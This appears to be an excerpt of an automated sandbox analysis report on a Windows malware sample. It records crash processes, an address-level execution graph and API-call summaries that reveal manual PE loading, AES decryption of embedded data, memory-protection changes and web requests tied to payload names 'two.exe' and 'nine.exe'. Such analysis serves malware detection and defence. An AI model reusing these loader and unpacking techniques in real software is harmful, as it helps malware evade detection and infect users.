                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 1284
                                                            Imagebase:0x590000
                                                            File size:483'680 bytes
                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:21
                                                            Start time:04:08:46
                                                            Start date:08/10/2024
                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 1508
                                                            Imagebase:0x590000
                                                            File size:483'680 bytes
                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:24
                                                            Start time:04:09:32
                                                            Start date:08/10/2024
                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 1540
                                                            Imagebase:0x590000
                                                            File size:483'680 bytes
                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true


                                                              Execution Graph

                                                              Execution Coverage:3%
                                                              Dynamic/Decrypted Code Coverage:17.3%
                                                              Signature Coverage:14.9%
                                                              Total number of Nodes:1210
                                                              Total number of Limit Nodes:24
42786 40696f 42791 406f5a 42786->42791 43349 4021c0 27 API calls 42786->43349 42788 406a3d 42787->42788 43297 402240 25 API calls std::ios_base::_Ios_base_dtor 42788->43297 42793 406b16 42789->42793 42794 406bd4 42790->42794 43228 401670 42791->43228 43304 402240 25 API calls std::ios_base::_Ios_base_dtor 42793->43304 42805 4021f0 25 API calls 42794->42805 42797 406a46 42800 4021f0 25 API calls 42797->42800 42799 406f6d 43232 408a70 42799->43232 42803 406a4e 42800->42803 42801 406b1f 42804 4021f0 25 API calls 42801->42804 43298 407730 39 API calls 2 library calls 42803->43298 42808 406b27 42804->42808 42809 406be8 42805->42809 42806 406f76 42813 4022c0 27 API calls 42806->42813 43305 407a50 39 API calls 2 library calls 42808->43305 42812 406ccf 42809->42812 43312 407d70 39 API calls 2 library calls 42809->43312 42810 406a53 42821 4022c0 27 API calls 42810->42821 43322 408110 39 API calls 2 library calls 42812->43322 42817 406f89 42813->42817 42815 406b2c 42824 4022c0 27 API calls 42815->42824 43242 4089f0 42817->43242 42818 406cd9 42826 4022c0 27 API calls 42818->42826 42819 406bf5 42825 4022c0 27 API calls 42819->42825 42823 406a63 42821->42823 42822 406f94 42833 4022c0 27 API calls 42822->42833 42834 4021f0 25 API calls 42823->42834 42827 406b3c 42824->42827 42829 406c05 42825->42829 42830 406ce9 42826->42830 43306 402240 25 API calls std::ios_base::_Ios_base_dtor 42827->43306 43313 402240 25 API calls std::ios_base::_Ios_base_dtor 42829->43313 42839 4021f0 25 API calls 42830->42839 42831 406b45 42835 4021f0 25 API calls 42831->42835 42837 406fa7 42833->42837 42838 406a77 42834->42838 42840 406b4d 42835->42840 42836 406c0e 42841 4021f0 25 API calls 42836->42841 43252 408950 42837->43252 42843 406a98 42838->42843 42844 406a7b 42838->42844 42846 406cfd 42839->42846 43307 407ad0 39 API calls 2 library calls 42840->43307 42848 406c16 42841->42848 43300 407840 39 API calls 2 library calls 42843->43300 43299 4077c0 39 API calls 2 library calls 42844->43299 42852 406d01 
42846->42852 42853 406d7f 42846->42853 43314 407df0 39 API calls 2 library calls 42848->43314 42850 406fb2 42862 4022c0 27 API calls 42850->42862 42851 406a80 42863 4022c0 27 API calls 42851->42863 43323 4081a0 39 API calls 2 library calls 42852->43323 43329 408330 39 API calls 2 library calls 42853->43329 42854 406b52 42864 4022c0 27 API calls 42854->42864 42856 406a9d 42865 4022c0 27 API calls 42856->42865 42859 406c1b 42869 4022c0 27 API calls 42859->42869 42860 406d84 42873 4022c0 27 API calls 42860->42873 42861 406d06 42874 4022c0 27 API calls 42861->42874 42866 406fc5 42862->42866 42867 406a90 42863->42867 42868 406b62 42864->42868 42870 406aad 42865->42870 43262 40ad00 42866->43262 43348 402240 25 API calls std::ios_base::_Ios_base_dtor 42867->43348 42884 4021f0 25 API calls 42868->42884 42875 406c2b 42869->42875 42886 4021f0 25 API calls 42870->42886 42878 406d94 42873->42878 42879 406d16 42874->42879 43315 402240 25 API calls std::ios_base::_Ios_base_dtor 42875->43315 42894 4021f0 25 API calls 42878->42894 43324 402240 25 API calls std::ios_base::_Ios_base_dtor 42879->43324 42881 406ff2 43270 40ae10 42881->43270 42882 406f41 42889 4021f0 25 API calls 42882->42889 42891 406b76 42884->42891 42885 406c34 42892 4021f0 25 API calls 42885->42892 42887 406ac1 42886->42887 42887->42786 43301 4078d0 39 API calls 2 library calls 42887->43301 42889->42786 42890 406d1f 42895 4021f0 25 API calls 42890->42895 42896 406b84 42891->42896 42897 406b7a 42891->42897 42898 406c3c 42892->42898 42903 406da8 42894->42903 42904 406d27 42895->42904 43309 407be0 39 API calls 2 library calls 42896->43309 43308 407b60 39 API calls 2 library calls 42897->43308 43316 407e70 39 API calls 2 library calls 42898->43316 42902 40ad60 27 API calls 42908 40701f 42902->42908 42909 406e2a 42903->42909 42910 406dac 42903->42910 43325 408220 39 API calls 2 library calls 42904->43325 42906 406c41 42919 4022c0 27 API calls 42906->42919 42907 406b89 42920 4022c0 27 API calls 42907->42920 42912 40ae10 
27 API calls 42908->42912 43336 408540 39 API calls 2 library calls 42909->43336 43330 4083c0 39 API calls 2 library calls 42910->43330 42916 407034 42912->42916 42915 406d2c 42922 4022c0 27 API calls 42915->42922 42921 40ad60 27 API calls 42916->42921 42917 406e2f 42926 4022c0 27 API calls 42917->42926 42918 406db1 42927 4022c0 27 API calls 42918->42927 42923 406c51 42919->42923 42924 406b99 42920->42924 42925 40704c 42921->42925 42928 406d3c 42922->42928 43317 402240 25 API calls std::ios_base::_Ios_base_dtor 42923->43317 42939 4021f0 25 API calls 42924->42939 42930 4021f0 25 API calls 42925->42930 42931 406e3f 42926->42931 42932 406dc1 42927->42932 43326 402240 25 API calls std::ios_base::_Ios_base_dtor 42928->43326 42935 40705a 42930->42935 42946 4021f0 25 API calls 42931->42946 43331 402240 25 API calls std::ios_base::_Ios_base_dtor 42932->43331 42934 406c5a 42938 4021f0 25 API calls 42934->42938 42940 4021f0 25 API calls 42935->42940 42937 406d45 42942 4021f0 25 API calls 42937->42942 42943 406c62 42938->42943 42944 406bad 42939->42944 42945 407065 42940->42945 42941 406dca 42947 4021f0 25 API calls 42941->42947 42948 406d4d 42942->42948 43318 407ef0 39 API calls 2 library calls 42943->43318 42944->42786 43310 407c70 39 API calls 2 library calls 42944->43310 42950 4021f0 25 API calls 42945->42950 42952 406e53 42946->42952 42953 406dd2 42947->42953 43327 4082b0 39 API calls 2 library calls 42948->43327 42951 407070 42950->42951 42957 4021f0 25 API calls 42951->42957 42958 406e57 42952->42958 42959 406eaa 42952->42959 43332 408440 39 API calls 2 library calls 42953->43332 42955 406c67 42968 4022c0 27 API calls 42955->42968 42962 40707b 42957->42962 43337 4085d0 39 API calls 2 library calls 42958->43337 43342 408750 39 API calls 2 library calls 42959->43342 42961 406d52 42971 4022c0 27 API calls 42961->42971 42966 4021f0 25 API calls 42962->42966 42964 406dd7 42974 4022c0 27 API calls 42964->42974 42970 407086 42966->42970 42967 406e5c 42978 4022c0 27 API calls 
42967->42978 42972 406c77 42968->42972 42969 406eaf 42976 4022c0 27 API calls 42969->42976 42973 4021f0 25 API calls 42970->42973 42975 406d62 42971->42975 42981 4021f0 25 API calls 42972->42981 42977 407091 42973->42977 42979 406de7 42974->42979 43328 402240 25 API calls std::ios_base::_Ios_base_dtor 42975->43328 42982 406ebf 42976->42982 42983 4021f0 25 API calls 42977->42983 42984 406e6c 42978->42984 43333 402240 25 API calls std::ios_base::_Ios_base_dtor 42979->43333 42987 406c8b 42981->42987 42998 4021f0 25 API calls 42982->42998 42988 40709c 42983->42988 43338 402240 25 API calls std::ios_base::_Ios_base_dtor 42984->43338 42986 406d6b 42991 4021f0 25 API calls 42986->42991 42992 406c94 42987->42992 43319 407f80 39 API calls 2 library calls 42987->43319 42993 4021f0 25 API calls 42988->42993 42990 406df0 42995 4021f0 25 API calls 42990->42995 42991->42786 43320 408000 39 API calls 2 library calls 42992->43320 43036 4070ab 42993->43036 42994 406e75 43000 4021f0 25 API calls 42994->43000 42996 406df8 42995->42996 43334 4084c0 39 API calls 2 library calls 42996->43334 43003 406ed3 42998->43003 43001 406e7d 43000->43001 43339 408650 39 API calls 2 library calls 43001->43339 43003->42786 43343 4087d0 39 API calls 2 library calls 43003->43343 43004 406c9e 43010 4022c0 27 API calls 43004->43010 43006 406dfd 43011 4022c0 27 API calls 43006->43011 43007 406e82 43014 4022c0 27 API calls 43007->43014 43009 406edc 43018 4022c0 27 API calls 43009->43018 43012 406cae 43010->43012 43015 406e0d 43011->43015 43019 4021f0 25 API calls 43012->43019 43013 40710a Sleep 43013->43036 43016 406e92 43014->43016 43335 402240 25 API calls std::ios_base::_Ios_base_dtor 43015->43335 43340 402240 25 API calls std::ios_base::_Ios_base_dtor 43016->43340 43022 406eec 43018->43022 43023 406cc2 43019->43023 43021 406e16 43026 4021f0 25 API calls 43021->43026 43344 402240 25 API calls std::ios_base::_Ios_base_dtor 43022->43344 43023->42786 43321 408090 39 API calls 2 library calls 43023->43321 
43024 4022c0 27 API calls 43024->43036 43025 406e9b 43029 4021f0 25 API calls 43025->43029 43026->42786 43028 406ef5 43030 4021f0 25 API calls 43028->43030 43032 406ea3 43029->43032 43033 406efd 43030->43033 43341 4086d0 39 API calls 2 library calls 43032->43341 43345 408850 39 API calls 2 library calls 43033->43345 43036->43013 43036->43024 43037 407113 43036->43037 43043 407102 43036->43043 43039 4021f0 25 API calls 43037->43039 43038 406f02 43046 4022c0 27 API calls 43038->43046 43040 40711b 43039->43040 43042 40a850 27 API calls 43040->43042 43041 406ea8 43044 4022c0 27 API calls 43041->43044 43045 40712f 43042->43045 43047 4021f0 25 API calls 43043->43047 43044->42867 43048 40a850 27 API calls 43045->43048 43049 406f12 43046->43049 43047->43013 43050 407148 43048->43050 43346 402240 25 API calls std::ios_base::_Ios_base_dtor 43049->43346 43052 40a850 27 API calls 43050->43052 43057 40715b 43052->43057 43053 406f1b 43054 4021f0 25 API calls 43053->43054 43055 406f23 43054->43055 43347 4088d0 39 API calls 2 library calls 43055->43347 43058 40a850 27 API calls 43057->43058 43060 40718b 43057->43060 43058->43060 43350 408b00 39 API calls 2 library calls 43060->43350 43061 407198 43062 4022c0 27 API calls 43061->43062 43063 4071a8 43062->43063 43064 4021f0 25 API calls 43063->43064 43065 4071bc 43064->43065 43066 407260 43065->43066 43068 401670 27 API calls 43065->43068 43352 408c70 39 API calls 2 library calls 43066->43352 43070 4071d7 43068->43070 43069 407265 43073 4022c0 27 API calls 43069->43073 43351 408b90 39 API calls 2 library calls 43070->43351 43072 4071e0 43075 4022c0 27 API calls 43072->43075 43074 407278 43073->43074 43076 4021f0 25 API calls 43074->43076 43078 4071f0 43075->43078 43077 40728f 43076->43077 43102 4072ef 43077->43102 43353 408de0 39 API calls 2 library calls 43077->43353 43083 407227 43078->43083 43084 407218 Sleep 43078->43084 43079 4045e0 23 API calls 43081 407300 43079->43081 43082 4072a0 43086 4022c0 27 API calls 43082->43086 43089 
4022c0 27 API calls 43083->43089 43084->43078 43085 407225 43084->43085 43087 407249 43085->43087 43088 4072af 43086->43088 43090 4021f0 25 API calls 43087->43090 43354 408d60 39 API calls 2 library calls 43088->43354 43093 40723e 43089->43093 43091 407251 43090->43091 43094 4016d0 CoUninitialize 43091->43094 43096 4021f0 25 API calls 43093->43096 43094->43066 43095 4072c3 43097 4022c0 27 API calls 43095->43097 43096->43087 43098 4072d2 43097->43098 43355 408d00 39 API calls __Init_thread_footer 43098->43355 43100 4072e0 43101 4022c0 27 API calls 43100->43101 43101->43102 43102->43079 43104 40a87b 43103->43104 43105 40a882 43104->43105 43106 40a8d4 43104->43106 43107 40a8b5 43104->43107 43105->42561 43114 40a8c9 _Yarn 43106->43114 43468 4015c0 27 API calls 5 library calls 43106->43468 43108 40a90a 43107->43108 43109 40a8bc 43107->43109 43469 4015c0 27 API calls 3 library calls 43108->43469 43467 4015c0 27 API calls 5 library calls 43109->43467 43113 40a8c2 43113->43114 43115 411337 25 API calls 43113->43115 43114->42561 43116 40a914 43115->43116 43470 409bf0 25 API calls std::ios_base::_Ios_base_dtor 43116->43470 43118 40a92b std::ios_base::_Ios_base_dtor 43118->42561 43119->42561 43120->42584 43121->42597 43122->42592 43123->42620 43124->42601 43125->42612 43126->42604 43127->42620 43128->42567 43129->42575 43130->42568 43131->42589 43132->42586 43133->42605 43135 404171 43134->43135 43136 404169 43134->43136 43135->42646 43138 404180 43136->43138 43152 40e393 RaiseException 43136->43152 43153 40e393 RaiseException 43138->43153 43140 4041bf 43154 40e131 26 API calls 2 library calls 43140->43154 43142 4041e4 43142->42646 43143->42648 43144->42650 43145->42653 43146->42656 43147->42658 43148->42668 43149->42672 43151->42668 43152->43138 43153->43140 43154->43142 43156 40bf70 43155->43156 43157 40bf42 43155->43157 43161 40bf7c 43156->43161 43163 40bfa0 27 API calls 43156->43163 43158 404150 27 API calls 43157->43158 43159 40bf5c 43158->43159 43159->42677 43161->42677 
43162->42677 43163->43161 43165 414f3c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 43164->43165 43165->42683 43356 418e23 GetLastError 43166->43356 43170 414ef2 43169->43170 43171 414ee8 43169->43171 43170->42711 43401 414dd6 41 API calls 2 library calls 43171->43401 43184 404491 std::ios_base::_Ios_base_dtor 43173->43184 43174 40a850 27 API calls 43174->43184 43175 404571 std::ios_base::_Ios_base_dtor 43176 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 43175->43176 43178 4045d3 43176->43178 43178->42711 43179 40452d 43179->43175 43181 4045d7 43179->43181 43180 404515 std::ios_base::_Ios_base_dtor 43180->43175 43180->43181 43402 40b620 25 API calls std::ios_base::_Ios_base_dtor 43180->43402 43182 411337 25 API calls 43181->43182 43183 4045dc 43182->43183 43184->43174 43184->43180 43184->43181 43186 40b988 43185->43186 43189 40b91a _Yarn 43185->43189 43403 40bd10 27 API calls 4 library calls 43186->43403 43188 40b99a 43188->42711 43189->42711 43191 401d72 43190->43191 43191->43191 43192 402460 27 API calls 43191->43192 43193 401d85 43192->43193 43194 402460 27 API calls 43193->43194 43195 401e4d _Yarn 43194->43195 43404 411414 43195->43404 43198 401f83 43199 401ff3 std::ios_base::_Ios_base_dtor 43198->43199 43201 402022 43198->43201 43200 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 43199->43200 43202 402017 43200->43202 43203 411337 25 API calls 43201->43203 43202->42711 43204 402027 43203->43204 43205 401d20 39 API calls 43204->43205 43207 40736e 43206->43207 43208 40733c 43206->43208 43210 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 43207->43210 43433 40d10c 6 API calls 43208->43433 43212 407380 43210->43212 43211 407346 43211->43207 43434 40d41e 28 API calls 43211->43434 43212->42695 43214 407364 43435 40d0c2 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 43214->43435 43217 4022e3 43216->43217 43217->43217 43218 402460 27 API calls 
43217->43218 43219 4022f5 43218->43219 43219->42699 43221 4021fb 43220->43221 43222 402216 std::ios_base::_Ios_base_dtor 43220->43222 43221->43222 43223 411337 25 API calls 43221->43223 43222->42703 43224 40223a 43223->43224 43225 402271 std::ios_base::_Ios_base_dtor 43224->43225 43226 411337 25 API calls 43224->43226 43225->42703 43227 4022bc 43226->43227 43229 401683 CallUnexpected 43228->43229 43230 40cfd1 27 API calls 43229->43230 43231 40169a CallUnexpected 43230->43231 43231->42799 43233 408ade 43232->43233 43234 408aa2 43232->43234 43236 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 43233->43236 43436 40d10c 6 API calls 43234->43436 43238 408af0 43236->43238 43237 408aac 43237->43233 43437 40d41e 28 API calls 43237->43437 43238->42806 43240 408ad4 43438 40d0c2 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 43240->43438 43243 408a1c 43242->43243 43251 408a4e 43242->43251 43439 40d10c 6 API calls 43243->43439 43244 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 43246 408a60 43244->43246 43246->42822 43247 408a26 43247->43251 43440 40d41e 28 API calls 43247->43440 43249 408a44 43441 40d0c2 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 43249->43441 43251->43244 43253 4089d2 43252->43253 43254 40898d 43252->43254 43255 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 43253->43255 43442 40d10c 6 API calls 43254->43442 43257 4089e5 43255->43257 43257->42850 43258 408997 43258->43253 43443 40d41e 28 API calls 43258->43443 43260 4089c8 43444 40d0c2 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 43260->43444 43263 40ad12 43262->43263 43264 40b900 27 API calls 43263->43264 43265 406fda 43264->43265 43266 40ad60 43265->43266 43267 40ad79 43266->43267 43268 40ad8d _Yarn 43267->43268 43445 402730 27 API calls 4 library calls 43267->43445 43268->42881 43446 40b720 
43270->43446 43272 407007 43272->42902 43273->42711 43274->42711 43275->42711 43277 414d8d 23 API calls 43276->43277 43278 4045e7 43277->43278 43279->42734 43281 4016da 43280->43281 43282 4016ea CoUninitialize 43281->43282 43283->42717 43284->42736 43285->42752 43286->42770 43287->42786 43288->42716 43289->42732 43290->42753 43291->42769 43292->42786 43293->42709 43294->42744 43295->42763 43296->42781 43297->42797 43298->42810 43299->42851 43300->42856 43301->42851 43302->42745 43303->42782 43304->42801 43305->42815 43306->42831 43307->42854 43308->42851 43309->42907 43310->42776 43311->42783 43312->42819 43313->42836 43314->42859 43315->42885 43316->42906 43317->42934 43318->42955 43319->42992 43320->43004 43321->42812 43322->42818 43323->42861 43324->42890 43325->42915 43326->42937 43327->42961 43328->42986 43329->42860 43330->42918 43331->42941 43332->42964 43333->42990 43334->43006 43335->43021 43336->42917 43337->42967 43338->42994 43339->43007 43340->43025 43341->43041 43342->42969 43343->43009 43344->43028 43345->43038 43346->43053 43347->43041 43348->42882 43349->42791 43350->43061 43351->43072 43352->43069 43353->43082 43354->43095 43355->43100 43357 418e40 43356->43357 43358 418e3a 43356->43358 43363 418e46 SetLastError 43357->43363 43387 419bb2 6 API calls std::_Locinfo::_Locinfo_dtor 43357->43387 43386 419b73 6 API calls std::_Locinfo::_Locinfo_dtor 43358->43386 43361 418e5e 43362 418e62 43361->43362 43361->43363 43388 41968b 14 API calls 3 library calls 43362->43388 43369 406428 Sleep 43363->43369 43370 418eda 43363->43370 43365 418e6e 43367 418e76 43365->43367 43368 418e8d 43365->43368 43389 419bb2 6 API calls std::_Locinfo::_Locinfo_dtor 43367->43389 43396 419bb2 6 API calls std::_Locinfo::_Locinfo_dtor 43368->43396 43369->42686 43399 4160b9 37 API calls CallUnexpected 43370->43399 43375 418e99 43376 418e9d 43375->43376 43377 418eae 43375->43377 43397 419bb2 6 API calls std::_Locinfo::_Locinfo_dtor 43376->43397 43398 418c51 14 API calls __Getctype 
43377->43398 43381 418e84 43390 4196e8 43381->43390 43382 418eb9 43384 4196e8 _free 14 API calls 43382->43384 43383 418e8a 43383->43363 43385 418ec0 43384->43385 43385->43363 43386->43357 43387->43361 43388->43365 43389->43381 43391 4196f3 RtlFreeHeap 43390->43391 43395 41971c __dosmaperr 43390->43395 43392 419708 43391->43392 43391->43395 43400 411401 14 API calls __dosmaperr 43392->43400 43394 41970e GetLastError 43394->43395 43395->43383 43396->43375 43397->43381 43398->43382 43400->43394 43401->43170 43402->43179 43403->43188 43407 419075 43404->43407 43410 419089 43407->43410 43408 41908d 43424 401e98 InternetOpenA 43408->43424 43426 411401 14 API calls __dosmaperr 43408->43426 43410->43408 43412 4190c7 43410->43412 43410->43424 43411 4190b7 43427 411327 25 API calls ___std_exception_copy 43411->43427 43428 411431 37 API calls 2 library calls 43412->43428 43415 4190d3 43416 4190dd 43415->43416 43420 4190f4 43415->43420 43429 421f0d 25 API calls 2 library calls 43416->43429 43418 419176 43418->43424 43430 411401 14 API calls __dosmaperr 43418->43430 43419 4191cb 43419->43424 43432 411401 14 API calls __dosmaperr 43419->43432 43420->43418 43420->43419 43423 4191bf 43431 411327 25 API calls ___std_exception_copy 43423->43431 43424->43198 43426->43411 43427->43424 43428->43415 43429->43424 43430->43423 43431->43424 43432->43424 43433->43211 43434->43214 43435->43207 43436->43237 43437->43240 43438->43233 43439->43247 43440->43249 43441->43251 43442->43258 43443->43260 43444->43253 43445->43268 43447 40b763 43446->43447 43448 40b8f0 43447->43448 43449 40b830 43447->43449 43453 40b768 _Yarn 43447->43453 43465 401660 27 API calls 43448->43465 43454 40b865 43449->43454 43455 40b88b 43449->43455 43451 40b8f5 43466 4015c0 27 API calls 3 library calls 43451->43466 43453->43272 43454->43451 43457 40b870 43454->43457 43462 40b87d _Yarn 43455->43462 43464 4015c0 27 API calls 5 library calls 43455->43464 43456 40b876 43459 411337 25 API calls 43456->43459 43456->43462 43463 
4015c0 27 API calls 5 library calls 43457->43463 43461 40b8ff 43459->43461 43462->43272 43463->43456 43464->43462 43466->43456 43467->43113 43468->43114 43469->43113 43470->43118 43472 414c39 43471->43472 43473 414c4b 43471->43473 43499 40d906 GetModuleHandleW 43472->43499 43483 414ad2 43473->43483 43477 414c3e 43477->43473 43500 414cd1 GetModuleHandleExW 43477->43500 43478 40d66b 43478->42629 43482 414c8e 43484 414ade ___scrt_is_nonwritable_in_current_image 43483->43484 43506 414fa9 EnterCriticalSection 43484->43506 43486 414ae8 43507 414b3e 43486->43507 43488 414af5 43511 414b13 43488->43511 43491 414c8f 43516 41b919 GetPEB 43491->43516 43494 414cbe 43497 414cd1 CallUnexpected 3 API calls 43494->43497 43495 414c9e GetPEB 43495->43494 43496 414cae GetCurrentProcess TerminateProcess 43495->43496 43496->43494 43498 414cc6 ExitProcess 43497->43498 43499->43477 43501 414cf0 GetProcAddress 43500->43501 43502 414d13 43500->43502 43503 414d05 43501->43503 43504 414c4a 43502->43504 43505 414d19 FreeLibrary 43502->43505 43503->43502 43504->43473 43505->43504 43506->43486 43508 414b4a ___scrt_is_nonwritable_in_current_image 43507->43508 43509 414bab CallUnexpected 43508->43509 43514 416f1d 14 API calls CallUnexpected 43508->43514 43509->43488 43515 414ff1 LeaveCriticalSection 43511->43515 43513 414b01 43513->43478 43513->43491 43514->43509 43515->43513 43517 41b933 43516->43517 43518 414c99 43516->43518 43520 419a42 5 API calls std::_Locinfo::_Locinfo_dtor 43517->43520 43518->43494 43518->43495 43520->43518 43521 413388 43522 4196e8 _free 14 API calls 43521->43522 43523 4133a0 43522->43523 43524 217003c 43525 2170049 43524->43525 43539 2170e0f SetErrorMode SetErrorMode 43525->43539 43530 2170265 43531 21702ce VirtualProtect 43530->43531 43533 217030b 43531->43533 43532 2170439 VirtualFree 43537 21705f4 LoadLibraryA 43532->43537 43538 21704be 43532->43538 43533->43532 43534 21704e3 LoadLibraryA 43534->43538 43536 21708c7 43537->43536 43538->43534 43538->43537 43540 2170223 
43539->43540 43541 2170d90 43540->43541 43542 2170dad 43541->43542 43543 2170238 VirtualAlloc 43542->43543 43544 2170dbb GetPEB 43542->43544 43543->43530 43544->43543 43545 100079ee 43546 10007a2c 43545->43546 43547 100079fc __dosmaperr 43545->43547 43553 10005926 12 API calls __dosmaperr 43546->43553 43547->43546 43549 10007a17 RtlAllocateHeap 43547->43549 43552 10005aed EnterCriticalSection LeaveCriticalSection __dosmaperr 43547->43552 43549->43547 43550 10007a2a 43549->43550 43552->43547 43553->43550

                                                              Control-flow Graph (function at 402c60; graph not reproduced)
                                                              APIs
                                                              • SetLastError.KERNEL32(0000000D), ref: 00402C86
                                                              • SetLastError.KERNEL32(000000C1), ref: 00402CC8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID: ,@$ ,@$@$DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$P,@0,@ ,@$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!
                                                              • API String ID: 1452528299-90842840
                                                              • Opcode ID: a8622f64d8070585d512a72ec777aab289d6801d447c326e6b8095fd7aed850a
                                                              • Instruction ID: d1ae0cd5652749efb72fafdd6d36f3c4f1fa47aae7819869a3385d061891a2f5
                                                              • Opcode Fuzzy Hash: a8622f64d8070585d512a72ec777aab289d6801d447c326e6b8095fd7aed850a
                                                              • Instruction Fuzzy Hash: E112AB71A012059BDB14CFA9D984BAEB7B5BF48304F14417AE809BB3C5D7B8ED41CB98

                                                              Control-flow Graph (function at 4034b0; graph not reproduced)
                                                              APIs
                                                              • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,A1833436), ref: 00403530
                                                              • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403554
                                                              • _mbstowcs.LIBCMT ref: 004035A7
                                                              • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004035BE
                                                              • GetLastError.KERNEL32 ref: 004035C8
                                                              • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 004035F0
                                                              • GetLastError.KERNEL32 ref: 004035FA
                                                              • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040360A
                                                              • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004036CC
                                                              • CryptDestroyKey.ADVAPI32(?), ref: 0040373E
                                                              • ___std_exception_copy.LIBVCRUNTIME ref: 004037BE
                                                              Strings
                                                              • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040350C, 004037A3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease___std_exception_copy_mbstowcs
                                                              • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                              • API String ID: 4265767208-63410773

                                                              Control-flow Graph

                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00408FE4
                                                              • __Init_thread_footer.LIBCMT ref: 0040927E
                                                              • __Init_thread_footer.LIBCMT ref: 004090CA
                                                                • Part of subcall function 0040D0C2: EnterCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0CC
                                                                • Part of subcall function 0040D0C2: LeaveCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0FF
                                                                • Part of subcall function 0040D0C2: RtlWakeAllConditionVariable.NTDLL ref: 0040D176
                                                              • __Init_thread_footer.LIBCMT ref: 0040946F
                                                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0040963D
                                                                • Part of subcall function 0040D10C: EnterCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D117
                                                                • Part of subcall function 0040D10C: LeaveCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D154
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$Init_thread_footer$EnterLeave$ConditionFileIos_base_dtorModuleNameVariableWakestd::ios_base::_
                                                              • String ID: GET$NOSUB$ZYA.$kc~z$nine.exe$two.exe
                                                              • API String ID: 2716318523-155817423

                                                              Control-flow Graph

                                                              APIs
                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 004029E8
                                                              • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 004029FD
                                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402A0B
                                                              • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402A26
                                                              • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402A45
                                                              • LocalFree.KERNEL32(00000000), ref: 00402A52
                                                              • LocalFree.KERNEL32(?), ref: 00402A57
                                                              Strings
                                                              Memory Dump Source
